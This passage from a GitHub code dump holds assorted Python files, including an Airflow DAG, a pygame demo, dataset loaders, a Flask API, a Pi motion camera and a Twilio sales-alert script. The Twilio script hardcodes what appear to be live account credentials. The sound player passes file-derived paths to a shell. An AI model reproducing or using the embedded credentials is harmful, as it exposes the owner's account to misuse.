= merge_canton_datasets(cantons_geo,df_canton,pop_canton)\n communes = merge_communes_datasets(communes_geo,df_municipality,pop_commune)\n \n\n write_json(cantons,WEBSITE_DATA_FILE_PATH + 'cantons.json')\n write_json(communes,WEBSITE_DATA_FILE_PATH +'communes.json')\n convert_file_to_topo_json(WEBSITE_DATA_FILE_PATH + 'cantons.json', \\\n WEBSITE_DATA_FILE_PATH +'cantons.topo.json')\n convert_file_to_topo_json(WEBSITE_DATA_FILE_PATH + 'communes.json', \\\n WEBSITE_DATA_FILE_PATH +'communes.topo.json')\n \nif __name__ == \"__main__\":\n pipeline_create_data()\n print('created_data')","repo_name":"com-480-data-visualization/datavis-project-2022-mng","sub_path":"notebooks/dataCreator.py","file_name":"dataCreator.py","file_ext":"py","file_size_in_byte":4569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20742372505","text":"import os\nfrom datetime import datetime, timedelta\n\nfrom airflow import DAG\n\nfrom astronomer.providers.microsoft.azure.operators.synapse import WasbToSynapseOperator\nfrom astronomer.providers.microsoft.azure.operators.synapse_sql import (\n SynapseSQLOperator,\n)\nEXECUTION_TIMEOUT = int(os.getenv(\"EXECUTION_TIMEOUT\", 6))\nRESOURCE_GROUP = \"team_provider_resource_group_test\"\nTRANSLATOR_TYPE = \"TabularTranslator\"\n\nEXECUTION_TIMEOUT = int(os.getenv(\"EXECUTION_TIMEOUT\", 6))\n\ndefault_args = {\n \"execution_timeout\": timedelta(hours=EXECUTION_TIMEOUT),\n \"azure_data_factory_conn_id\": \"adf_default\",\n}\n\nwith DAG(\n dag_id=\"example_synapse\",\n start_date=datetime(2021, 8, 13),\n schedule_interval=None,\n catchup=False,\n default_args=default_args,\n tags=[\"example\", \"Synapse\", \"Azure\"],\n) as dag:\n wasb_to_synapse = WasbToSynapseOperator(\n task_id=\"wasb_to_synapse\",\n source_name=\"DelimitedText3\",\n destination_name=\"AzureSynapseAnalyticsTable1\",\n resource_group_name=\"team_provider_resource_group_test\",\n factory_name=\"providersdf\",\n activity_name=\"viraj_sf_business_locations\",\n translator_type=\"TabularTranslator\",\n mappings=[\n {\"source\": {\"name\": \"Location Id\"}, \"sink\": {\"name\": 
\"location_id\"}},\n {\"source\": {\"name\": \"Business Account Number\"}, \"sink\": {\"name\": \"acct_number\"}},\n {\"source\": {\"name\": \"Ownership Name\"}, \"sink\": {\"name\": \"owner_name\"}},\n {\"source\": {\"name\": \"DBA Name\"}, \"sink\": {\"name\": \"dba_name\"}},\n {\"source\": {\"name\": \"Street Address\"}, \"sink\": {\"name\": \"address\"}},\n {\"source\": {\"name\": \"City\"}, \"sink\": {\"name\": \"city\"}},\n {\"source\": {\"name\": \"State\"}, \"sink\": {\"name\": \"state\"}},\n {\"source\": {\"name\": \"Source Zipcode\"}, \"sink\": {\"name\": \"zipcode\"}},\n {\"source\": {\"name\": \"Business Start Date\"}, \"sink\": {\"name\": \"start_date\"}},\n {\"source\": {\"name\": \"Business End Date\"}, \"sink\": {\"name\": \"end_date\"}},\n {\"source\": {\"name\": \"Location Start Date\"}, \"sink\": {\"name\": \"loc_start_date\"}},\n {\"source\": {\"name\": \"Location End Date\"}, \"sink\": {\"name\": \"loc_end_date\"}},\n {\"source\": {\"name\": \"Mail Address\"}, \"sink\": {\"name\": \"mail_address\"}},\n ],\n )\n\n # wasbtosynapase_fire = WasbToSynapseOperator(\n # task_id='fire_data',\n # # Make sure to rename files\n # source_name= \"fire_data\",\n # destination_name=\"AzureSynapseAnalyticsTable2\",\n # resource_group_name=RESOURCE_GROUP,\n # # Need to create one factory per file?\n # factory_name=\"providersdf\",\n # # Activity ties to factory\n # activity_name=\"viraj_copy_fire_data\",\n # # This is a constant\n # translator_type=TRANSLATOR_TYPE,\n # mappings=[\n # {\"source\": {\"name\": \"Call Number\"}, \"sink\": {\"name\": \"call_number\"}},\n # {\"source\": {\"name\": \"Unit ID\"}, \"sink\": {\"name\": \"unit_id\"}},\n # {\"source\": {\"name\": \"Incident Number\"}, \"sink\": {\"name\": \"incidient_number\"}},\n # {\"source\": {\"name\": \"Call Type\"}, \"sink\": {\"name\": \"call_type\"}},\n # {\"source\": {\"name\": \"Call Date\"}, \"sink\": {\"name\": \"call_date\"}},\n # {\"source\": {\"name\": \"Watch Date\"}, \"sink\": {\"name\": \"watch_date\"}},\n # {\"source\": {\"name\": \"Received DtTm\"}, \"sink\": {\"name\": \"received_date\"}},\n # {\"source\": {\"name\": \"Entry DtTm\"}, \"sink\": {\"name\": \"entry_time\"}},\n # {\"source\": {\"name\": \"Dispatch DtTm\"}, \"sink\": {\"name\": \"dispatch\"}},\n # {\"source\": {\"name\": \"Response DtTm\"}, \"sink\": {\"name\": \"response_time\"}},\n # {\"source\": {\"name\": \"On Scene DtTm\"}, \"sink\": {\"name\": \"on_scene\"}},\n # {\"source\": {\"name\": \"Transport DtTm\"}, \"sink\": {\"name\": \"transport_time\"}},\n # {\"source\": {\"name\": \"Hospital DtTm\"}, \"sink\": {\"name\": \"hospital_time\"}},\n # {\"source\": {\"name\": \"Call Final Disposition\"}, \"sink\": {\"name\": \"final_dispatch\"}},\n # {\"source\": {\"name\": \"Available DtTm\"}, \"sink\": {\"name\": \"avaiable_time\"}},\n # {\"source\": {\"name\": \"Address\"}, \"sink\": {\"name\": \"address\"}},\n # {\"source\": {\"name\": \"City\"}, \"sink\": {\"name\": \"city\"}},\n # {\"source\": {\"name\": \"Zipcode of Incident\"}, \"sink\": {\"name\": \"zipcode\"}},\n # {\"source\": {\"name\": \"Battalion\"}, \"sink\": {\"name\": \"batallion\"}},\n # {\"source\": {\"name\": \"Station Area\"}, \"sink\": {\"name\": \"station_area\"}},\n # {\"source\": {\"name\": \"Box\"}, \"sink\": {\"name\": \"box\"}},\n # {\"source\": {\"name\": \"Original Priority\"}, \"sink\": {\"name\": \"origin_district\"}},\n # {\"source\": {\"name\": \"Priority\"}, \"sink\": {\"name\": \"priority\"}},\n # {\"source\": {\"name\": \"Final Priority\"}, \"sink\": {\"name\": 
\"final_priority\"}},\n # {\"source\": {\"name\": \"ALS Unit\"}, \"sink\": {\"name\": \"als_unit\"}},\n # {\"source\": {\"name\": \"Call Type Group\"}, \"sink\": {\"name\": \"call_type_group\"}},\n # {\"source\": {\"name\": \"Number of Alarms\"}, \"sink\": {\"name\": \"num_alarms\"}},\n # # {\"source\": {\"name\": \"Unit Type\"}, \"sink\": {\"name\": \"unit_type\"}},\n # {\"source\": {\"name\": \"Unit sequence in call dispatch\"}, \"sink\": {\"name\": \"unit_seq\"}},\n # {\"source\": {\"name\": \"Fire Prevention District\"}, \"sink\": {\"name\": \"fire_prevent_district\"}},\n # {\"source\": {\"name\": \"Supervisor District\"}, \"sink\": {\"name\": \"supervisor_district\"}},\n # {\"source\": {\"name\": \"Neighborhooods - Analysis Boundaries\"}, \"sink\": {\"name\": \"neighborhood\"}},\n # {\"source\": {\"name\": \"RowID\"}, \"sink\": {\"name\": \"rowid\"}},\n # {\"source\": {\"name\": \"case_location\"}, \"sink\": {\"name\": \"case_loc\"}}\n # # {\"source\": {\"name\": \"Analysis Neighborhoods\"}, \"sink\": {\"name\": \"analysis_neighborhoods\"}},\n\n # ],\n # )\n synapse_sql_query = SynapseSQLOperator(\n task_id=\"synapse_sql_query\",\n sql=\"SELECT zipcode, count(*) from [dbo].[sf_active_business_locations] GROUP BY zipcode\",\n )\n\n wasb_to_synapse","repo_name":"astronomer/azure_demo","sub_path":"dags/business_locations_transfer.py","file_name":"business_locations_transfer.py","file_ext":"py","file_size_in_byte":6088,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"41728985856","text":"import pygame\n\nclass objectq:\n def __init__(self,x,y,colour,speed_x,speed_y):\n self.x : float = x\n self.y : float = y\n self.r : float = 5\n self.colour = colour\n self.speed_x : float = speed_x\n self.speed_y : float = speed_y\n\n def draw(self, win):\n pygame.draw.circle(win,self.colour,(self.x,self.y),self.r)\n\n def hitWall(self):\n if self.x + self.r == 500.0:\n self.speed_x *= -1.0\n if self.x - self.r == 0.0:\n self.speed_x *= -1.0\n if self.y + self.r == 500.0:\n self.speed_y *= -1.0\n if self.y - self.r == 0.0:\n self.speed_y *= -1.0\n\n def movement(self):\n self.x -= self.speed_x\n self.y -= self.speed_y\n\ndef windraw():\n win.fill((255,255,255))\n Ball.draw(win)\n pygame.display.update()\n\nif __name__=='__main__':\n\n pygame.init()\n win = pygame.display.set_mode((500,500))\n pygame.display.set_caption(\"Игра для тестов\")\n win.fill((255,255,255))\n Ball = objectq(40.0,460.0,(255,0,50),0.5,0.5)\n\n run = True\n while run:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n \n Ball.hitWall()\n Ball.movement()\n windraw()\n\n pygame.quit()\n","repo_name":"aanazaretyan/project-1sem","sub_path":"SmallSillyProgram.py","file_name":"SmallSillyProgram.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"6837765110","text":"class Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n phone = {\n \"2\": list(\"abc\"),\n \"3\": list(\"def\"),\n \"4\": list(\"ghi\"),\n \"5\": list(\"jkl\"),\n \"6\": list(\"mno\"),\n \"7\": list(\"pqrs\"),\n \"8\": list(\"tuv\"),\n \"9\": list(\"wxyz\")\n }\n \n def comb(digits):\n \n if not digits:\n return []\n \n if len(digits) == 1:\n return [[digit] for digit in phone[digits]]\n \n res = []\n for com in comb(digits[1:]):\n for letter in phone[digits[0]]:\n res.append([letter] + com)\n \n return res\n \n \n return [\"\".join(l) for l in 
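
Editor's note on objectq.hitWall in SmallSillyProgram.py above: the exact float comparisons (`self.x + self.r == 500.0`) only work because 0.5-sized steps from these particular start positions happen to land exactly on the walls; any other speed or start point sails through. A more robust check, sketched as a free function over the same ball object:

def bounce(ball, width=500.0, height=500.0):
    # Inequalities instead of float ==, so an overshooting step still bounces.
    if ball.x + ball.r >= width or ball.x - ball.r <= 0.0:
        ball.speed_x *= -1.0
    if ball.y + ball.r >= height or ball.y - ball.r <= 0.0:
        ball.speed_y *= -1.0
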
comb(digits)]\n","repo_name":"zelzhan/Challenges-and-contests","sub_path":"LeetCode/letter_combination_of_phone.py","file_name":"letter_combination_of_phone.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22702099377","text":"import pandas\nimport numpy\nimport sys\n\n# Fabian Charly Friedrich, April 2020\n# Convert CSV from Wochenende pipeline or Nextflow blast pipeline to XLSX using pandas\n# Use the runbatch_csv_to_xlsx.sh script\n# Or python3 csv_to_xlsx_converter.py \n\n\ndef read_annot(file):\n lines = open(file, 'r').readlines()\n data = []\n\n\n for line in lines:\t\n split_line = line.strip().split(' ')\n\n tmp = []\n for i in range(3):\n try:\n tmp.append(split_line[i])\n except IndexError:\n tmp.append(\"\")\n\n try:\n tmp.append(' '.join(split_line[3:]))\n except IndexError:\n tmp.append(\"\")\n\n data.append(tmp)\n\n return pandas.DataFrame(numpy.array(data))\n\ndef read_krakenuniq(file):\n lines = open(file, 'r').readlines()\n data = []\n for line in lines[3:]:\n tmp = []\n split_line = line.replace('\\n', '').split('\\t')\n\n for i in range(9):\n try:\n tmp.append(split_line[i])\n except IndexError:\n tmp.append('')\n\n data.append(tmp)\n\n return pandas.DataFrame(numpy.array(data[1:]), columns=data[0])\n\n\ndef main():\n file = sys.argv[1]\n\n if (\"annot\" in str(file)):\n # used for nextflow_blast output\n df = read_annot(file)\n # convert to Excel\n df.to_excel(file.replace('.csv', '.xlsx'), index=None, header=False)\n\n elif (\".rep.\" in str(file)):\n # used for Wochenende reporting output\n df = pandas.read_csv(file)\n # convert to Excel\n df.to_excel(file.replace('.csv', '.xlsx'), index=None, header=True)\n\n elif \"se.report.txt\" in str(file):\n # used for kraken2 output\n df = pandas.read_csv(file, sep='\\t', header=None)\n # convert to excel\n df.to_excel(file.replace('.txt', '.xlsx'), index=False, header=False)\n\n elif \"report.txt\" in str(file):\n # used for krakenuniq output\n df = read_krakenuniq(file)\n # convert to excel\n df.to_excel(file.replace('.txt', '.xlsx'), index=False, header=True)\n\n else:\n print(\"Could not detect CSV / text type\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MHH-RCUG/Wochenende","sub_path":"reporting/csv_to_xlsx_converter.py","file_name":"csv_to_xlsx_converter.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"21"} +{"seq_id":"30929453701","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Play sound listed in a file.\n\nPlay comamnd is given in arguments.\nExample:\nfor Linux\n fixedphrase.py --phrase_list=phrases.txt --command=\"aplay --quiet\"\nfor Macintosh\n fixedphrase.py --phrase_list=phrases.txt --command=\"afplay\"\n\"\"\"\n\n\nimport gflags\nimport subprocess\nimport threading\n\nFLAGS = gflags.FLAGS\n\ngflags.DEFINE_string(\"command\", \"aplay --quiet\", \"command to play wav.\")\ngflags.DEFINE_string(\"phrase_list\", None, \"list of path to wav files\")\n\n\nfiles = list() # path to wav files\n\n\ndef initialize():\n \"\"\"Set file path.\n\n Call me BEFORE using say.\n \"\"\"\n with open(FLAGS.phrase_list) as f:\n for line in f.read().split(\"\\n\"):\n if line:\n files.append(line)\n\n\ndef say(idx_phrase):\n \"\"\"Play sound using FLAGS.commad.\"\"\"\n path = files[idx_phrase]\n cmd = FLAGS.command + \" \" + path\n proc = subprocess.Popen(cmd, shell=True)\n\n def target():\n proc.wait()\n\n 
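
Editor's note: the recursive comb() in letter_combination_of_phone.py above computes a cartesian product over each digit's letter set; itertools does this directly. Output order differs from the recursive version, which is fine since the problem accepts any order:

from itertools import product

PHONE = {"2": "abc", "3": "def", "4": "ghi", "5": "jkl",
         "6": "mno", "7": "pqrs", "8": "tuv", "9": "wxyz"}

def letter_combinations(digits):
    if not digits:
        return []
    return ["".join(p) for p in product(*(PHONE[d] for d in digits))]

print(letter_combinations("23"))  # ['ad', 'ae', 'af', 'bd', 'be', 'bf', 'cd', 'ce', 'cf']
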
thread = threading.Thread(target=target)\n thread.start()\n\n\nif __name__ == '__main__':\n import sys\n import time\n argv = gflags.FLAGS(sys.argv)\n initialize()\n say(1)\n time.sleep(1)\n","repo_name":"caa-project/caa-central","sub_path":"GPIOController/fixedphrase.py","file_name":"fixedphrase.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35920829401","text":"from inspect import getmembers, getdoc, getsource, isclass, ismethod, signature, Signature\nfrom os import chdir\nfrom os.path import abspath, dirname\nfrom pathlib import Path\n\nfrom do.API import Do\nimport do.structures.Exceptions\n\n\ndef api_docstring_description(function_name):\n\n def parameter_signature(parameter_item):\n parameter_key, parameter_value = parameter_item\n return f\"#### {parameter_key}\\n```py\\n{parameter_value.annotation}\\n```\"\n\n name = str(function_name.__name__)\n function_signature = signature(function_name, follow_wrapped=True)\n\n title = f\"## Function Signature - Do.{name}\\n\"\n print(function_signature)\n # header = source.split(\"\\n\")[0][:-1].split(\" \", maxsplit=1)[1].strip(\" \")\n header = f\"### Header\\n\\n```py\\ndef {function_signature}\\n```\\n\"\n \n parameters = \"### Parameters\\n\\n\" + \"\\n\".join(map(parameter_signature, function_signature.parameters.items()))\n if len(function_signature.parameters) == 0:\n parameters = \"### Parameters\\n\\n**None**\\n\"\n \n if function_signature.return_annotation is not Signature.empty:\n return_annotation = function_signature.return_annotation\n else:\n return_annotation = \"None\"\n\n return_value = f\"### Return Value\\n\\n```py\\n{return_annotation}\\n```\\n\"\n \n sections = [title, header, parameters, return_value]\n \n return \"\\n\".join(sections) + \"\\n
    \\n\"\n\n\ndef exception_description(exception_name):\n return f\"## {exception_name}\\n\\n> {getdoc(exception_name)}\\n\\n\"\n\n\ndef populate_wiki_stubs():\n\n chdir(dirname(abspath(__file__)))\n\n api_signatures = {name: api_docstring_description(method) for (name, method) in\n getmembers(Do(model=None), predicate=ismethod)}\n\n exceptions = {name: exception_description(exception) for (name, exception) in\n getmembers(do.structures.Exceptions, predicate=isclass)}\n\n wiki_dir = Path(\"pages\")\n\n for file in wiki_dir.iterdir():\n if not file.is_file():\n continue\n\n text = file.read_text().splitlines()\n\n found = False\n for line, content in enumerate(text):\n if content.startswith(\"STUB\"):\n stub, replace = content.split(\"|\")\n if replace in api_signatures:\n text[line] = api_signatures[replace]\n elif replace == \"exceptions\":\n text[line] = \"\\n\\n\".join(exceptions.values())\n found = True\n\n if found:\n file.write_text(\"\\n\".join(text))\n\n\nif __name__ == \"__main__\":\n populate_wiki_stubs()\n","repo_name":"bradendubois/do-calculus","sub_path":"archive/build_wiki.py","file_name":"build_wiki.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"37216225801","text":"class Solution:\n def findPeakElement(self, nums: 'List[int]') -> int:\n s = 0\n e = len(nums)-1\n while s <= e: # binary search, use the larger number as the limit each time, until find the peak number\n mid = (s+e)//2\n left = nums[mid-1] if mid > 0 else -float('inf')\n right = nums[mid+1] if mid < len(nums)-1 else -float('inf')\n if nums[mid] > left and nums[mid] > right:\n return mid\n else:\n if left >= nums[mid]:\n e = mid - 1\n else:\n s = mid + 1\n return s\n\n\n#the O(N) approach\n# if len(nums) == 1:\n# return 0\n# for i in range (len(nums)):\n# if i ==0 and nums[i] > nums[i+1]:\n# return i\n# elif i == len(nums)-1 and nums[i] > nums[i-1]:\n# return i\n# elif nums[i]> nums[i-1] and nums[i] > nums[i+1]:\n# return i\n\n","repo_name":"renjieliu/leetcode","sub_path":"0001_0599/162.py","file_name":"162.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"45617781575","text":"import multiprocessing\nimport os\nimport re\nimport torch\nfrom torch.utils.data import Dataset\nfrom .token_utils import Vocab, tokenize, truncate_pad, get_tokens_and_segments\n\n\ndef read_snli(data_dir, is_train):\n \"\"\"将SNLI数据集解析为前提、假设和标签\"\"\"\n\n def extract_text(s):\n # 删除我们不会使⽤的信息\n s = re.sub('\\\\(', '', s)\n s = re.sub('\\\\)', '', s)\n # ⽤⼀个空格替换两个或多个连续的空格\n s = re.sub('\\\\s{2,}', ' ', s)\n return s.strip()\n\n label_set = {'entailment': 0, 'contradiction': 1, 'neutral': 2}\n file_name = os.path.join(data_dir, 'snli_1.0_train.txt' if is_train else 'snli_1.0_test.txt')\n with open(file_name, 'r') as f:\n rows = [row.split('\\t') for row in f.readlines()[1:]]\n premises = [extract_text(row[1]) for row in rows if row[0] in label_set]\n hypotheses = [extract_text(row[2]) for row in rows if row[0] in label_set]\n labels = [label_set[row[0]] for row in rows if row[0] in label_set]\n return premises, hypotheses, labels\n\n\nclass SNLIBERTDataset(torch.utils.data.Dataset):\n def __init__(self, dataset, max_len, vocab=None):\n all_premise_hypothesis_tokens = [[p_tokens, h_tokens] for p_tokens, h_tokens in zip(*[tokenize([s.lower() for s in sentences])for sentences in dataset[:2]])]\n self.labels = 
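
Editor's note: the binary search in 162.py above guards both neighbours with sentinel infinities; the invariant can be stated more compactly — if nums[mid] < nums[mid+1] the slope rises to the right, so a peak must exist in the right half, otherwise one exists in the left half including mid. A sketch of that variant:

def find_peak(nums):
    s, e = 0, len(nums) - 1
    while s < e:
        mid = (s + e) // 2
        if nums[mid] < nums[mid + 1]:
            s = mid + 1  # rising edge: a peak lies strictly to the right
        else:
            e = mid      # falling edge: a peak lies at mid or to the left
    return s

print(find_peak([1, 2, 1, 3, 5, 6, 4]))  # 5 (index 1 is also a valid answer)
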
torch.tensor(dataset[2])\n self.vocab = vocab\n self.max_len = max_len\n (self.all_token_ids, self.all_segments, self.valid_lens) = self._preprocess(all_premise_hypothesis_tokens)\n print('read ' + str(len(self.all_token_ids)) + ' examples')\n\n def _preprocess(self, all_premise_hypothesis_tokens):\n pool = multiprocessing.Pool(4) # use 4 worker processes\n out = pool.map(self._mp_worker, all_premise_hypothesis_tokens)\n all_token_ids = [token_ids for token_ids, segments, valid_len in out]\n all_segments = [segments for token_ids, segments, valid_len in out]\n valid_lens = [valid_len for token_ids, segments, valid_len in out]\n return (torch.tensor(all_token_ids, dtype=torch.long),\n torch.tensor(all_segments, dtype=torch.long),\n torch.tensor(valid_lens))\n\n def _mp_worker(self, premise_hypothesis_tokens):\n p_tokens, h_tokens = premise_hypothesis_tokens\n self._truncate_pair_of_tokens(p_tokens, h_tokens)\n tokens, segments = get_tokens_and_segments(p_tokens, h_tokens)\n token_ids = self.vocab[tokens] + [self.vocab['<pad>']] * (self.max_len - len(tokens))\n segments = segments + [0] * (self.max_len - len(segments))\n valid_len = len(tokens)\n return token_ids, segments, valid_len\n\n def _truncate_pair_of_tokens(self, p_tokens, h_tokens):\n # reserve positions for the '<cls>', '<sep>' and '<sep>' tokens in the BERT input\n while len(p_tokens) + len(h_tokens) > self.max_len - 3:\n if len(p_tokens) > len(h_tokens):\n p_tokens.pop()\n else:\n h_tokens.pop()\n\n def __getitem__(self, idx):\n return (self.all_token_ids[idx], self.all_segments[idx], self.valid_lens[idx]), self.labels[idx]\n\n def __len__(self):\n return len(self.all_token_ids)\n","repo_name":"kaddly/NaturalLanguageProcessing","sub_path":"NaturalLanguageInference/BERT/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6293406126","text":"from flask import jsonify, request\nfrom app import app\nfrom app.restaurant_finder import find_restaurant\nfrom app.models import Restaurant, Base\nfrom create_db import engine\nfrom sqlalchemy.orm import sessionmaker\n\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\n@app.route('/restaurants/', methods=['GET', 'POST'])\ndef all_restaurants():\n\n if request.method == 'GET':\n restaurants = session.query(Restaurant).all()\n return jsonify([item.serialize for item in restaurants])\n\n if request.method == 'POST':\n location = request.args.get('l')\n meal = request.args.get('m')\n restaurant_data = find_restaurant(meal, location)\n\n if restaurant_data['name'] == 'No restaurants found.':\n return jsonify({\"error\": \"No Restaurants Found for {} in {}\".format(meal, location)})\n else:\n rest_query = session.query(Restaurant).filter_by(name=restaurant_data['name'])\n if rest_query.first():\n restaurant = rest_query.first()\n return jsonify({\"error\": \"Restaurant {} already exists in the database.\".format(restaurant.name)})\n else:\n restaurant = Restaurant(name=restaurant_data['name'],\n address=restaurant_data['address'].decode('utf-8'),\n image=restaurant_data['image'])\n session.add(restaurant)\n session.commit()\n return jsonify(restaurant=restaurant.serialize)\n\n\n@app.route('/restaurants/<int:id>/', methods=['GET', 'PUT', 'DELETE'])\ndef restaurant(id):\n restaurant = session.query(Restaurant).filter_by(id=id).one()\n if request.method == 'GET':\n return jsonify(restaurant.serialize)\n\n if request.method == 'PUT':\n name = request.args.get('name')\n address = 
request.args.get('address')\n image = request.args.get('image')\n\n restaurant.update(name, address, image)\n session.commit()\n return jsonify({'Updated': restaurant.serialize})\n\n if request.method == 'DELETE':\n session.delete(restaurant)\n session.commit()\n return jsonify({'deleted': {'restaurant': restaurant.id}})\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"disfear86/Restaurant-Menus","sub_path":"api/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40985555937","text":"# Solution:\n\n# 1. Open the 6 Excel files;\n# 2. For each file, check whether any value in the sales column is greater than 55,000\n# 3. If > 55,000, send an SMS with the salesperson's name, the month and the sales; otherwise the program stops\n\n\n\nimport pandas as pd\nimport openpyxl as xls\nimport os\nfrom twilio.rest import Client\n\naccount_sid = 'AC13a05e5b30717f3a34700abf6e65568b'\nauth_token = '8a63bb0cfbc2648fa317f4eb8d2f0cdc'\n\nlista_meses = ['janeiro', 'fevereiro','março','abril','maio','junho']\n\nfor mes in lista_meses:\n print(mes)\n tabela_vendas = pd.read_excel(mes + '.xlsx')\n #print(tabela_vendas)\n\n if (tabela_vendas['Vendas'] > 55000).any():\n vendedor = tabela_vendas.loc[tabela_vendas['Vendas'] > 55000,'Vendedor'].values[0]\n vendas = tabela_vendas.loc[tabela_vendas['Vendas'] > 55000,'Vendas'].values[0]\n print(f'Encontrado no mês de {mes} com mais de 55000. Vendedor:{vendedor} , Vendas{vendas}')\n else:\n print('Não encontrado')\n\n\n\n\nclient = Client(account_sid, auth_token)\n\nmessage = client.messages \\\n .create(\n body=f'Encontrado no mês de {mes} com mais de 55000. Vendedor:{vendedor} , Vendas{vendas}',\n from_='3204039070',\n to='5511973605501'\n )\n\nprint(message.sid)\n","repo_name":"fenunesmartins/Python_analise_de_comissao","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5438642487","text":"from typing import Union, List, Dict\nfrom src.insights.jobs import read\n\n\ndef get_max_salary(path: str) -> int:\n data = read(path)\n salaries_list = []\n max_salary = 0\n for row in data:\n if row[\"max_salary\"] and row[\"max_salary\"] != 'invalid':\n salaries_list.append(int(row[\"max_salary\"]))\n max_salary = max(salaries_list)\n return max_salary\n\n\ndef get_min_salary(path: str) -> int:\n data = read(path)\n salaries_list = []\n min_salary = 0\n for row in data:\n if row[\"min_salary\"] and row[\"min_salary\"] != 'invalid':\n salaries_list.append(int(row[\"min_salary\"]))\n min_salary = min(salaries_list)\n return min_salary\n\n\ndef matches_salary_range(job: Dict, salary: Union[int, str]) -> bool:\n try:\n if int(job[\"max_salary\"]) < int(job[\"min_salary\"]):\n raise ValueError('max_salary must be bigger than the min_salary')\n if int(job[\"min_salary\"]) <= int(salary) <= int(job[\"max_salary\"]):\n return True\n return False\n except (TypeError, KeyError) as error:\n raise ValueError(error)\n\n\ndef filter_by_salary_range(\n jobs: List[dict],\n salary: Union[str, int]\n) -> List[Dict]:\n filtered_by_salary = []\n for job in jobs:\n try:\n if matches_salary_range(job, salary):\n filtered_by_salary.append(job)\n except ValueError as error:\n print(error)\n return 
filtered_by_salary\n","repo_name":"heloisasantana/job-insights","sub_path":"src/insights/salaries.py","file_name":"salaries.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16841985576","text":"#!/usr/bin/python3\n'''\n takes in a URL, sends a request to the URL\n and displays the value of the X-Request-Id\n'''\nimport sys\nfrom urllib.request import Request, urlopen\n\nif __name__ == \"__main__\":\n url = sys.argv[1]\n req = Request(url)\n with urlopen(req) as response:\n headers = response.getheaders()\n\n for data in headers:\n if data[0] == \"X-Request-Id\":\n print(data[1])\n","repo_name":"andi-s0106/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/1-hbtn_header.py","file_name":"1-hbtn_header.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12237770724","text":"from gpiozero import MotionSensor \nfrom picamera import PiCamera\nfrom datetime import datetime\nimport time\nimport os\n\npir = MotionSensor(4)\ncamera = PiCamera()\nflag = 1\n\nwhile True:\n pir.wait_for_motion()\n print(\"Motion Detected\")\n today = datetime.now()\n fon = str('./' + today.strftime('%Y-%m-%d'))\n if today.hour == 0 and today.minute == 0 and today.second == 0:\n os.mkdir(fon)\n elif flag:\n os.mkdir(fon)\n flag = 0\n #dt = str(datetime.datetime.now())\n dt = time.strftime('%Y-%m-%d_%H:%M:%S')\n filename = fon + '/' + 'capture_' + dt + '.jpg'\n #camera.start_preview()\n camera.capture(filename)\n pir.wait_for_no_motion()\n continue\n #camera.close()\n #camera.stop_preview()\n","repo_name":"varada-raju/raspberrypi","sub_path":"pi_modules.py","file_name":"pi_modules.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34875675463","text":"from ..exception import SDKException\n\n\nclass TwoFactorAuthentication:\n \"\"\"Class for managing the security association roles on the commcell\"\"\"\n\n def __init__(self, commcell_object, organization_id=None):\n \"\"\"\n Initializes TwoFactorAuthentication class object\n\n Args:\n commcell_object -- commcell class object.\n\n organization_id -- id of the organization on which two factor authentication\n operations to be performed.\n default:None\n\n Raises:\n SDKException:\n if invalid args are sent.\n \"\"\"\n self._commcell = commcell_object\n self._tfa_status = None\n self._tfa_enabled_user_groups = None\n self._org_id = None\n self._cvpysdk_object = commcell_object._cvpysdk_object\n self._services = commcell_object._services\n self._update_response_ = commcell_object._update_response_\n if organization_id:\n if isinstance(organization_id, (int, str)):\n self._org_id = organization_id\n else:\n raise SDKException('Security', '101')\n self.refresh()\n\n def refresh(self):\n \"\"\"\n Refresh the properties of two factor authentication\n\n Returns:\n None\n \"\"\"\n self._get_tfa_info()\n\n def _get_tfa_info(self):\n \"\"\"\n Executes api on the server and fetches commcell/organization two factor authentication info.\n\n Returns:\n None\n\n Raises:\n SDKException:\n if failed to fetch details\n if response is empty\n if response is not success\n \"\"\"\n url = self._services['TFA']\n\n if self._org_id:\n url = self._services['ORG_TFA'] % self._org_id\n\n flag, response = self._cvpysdk_object.make_request(\n 'GET', url\n )\n\n if 
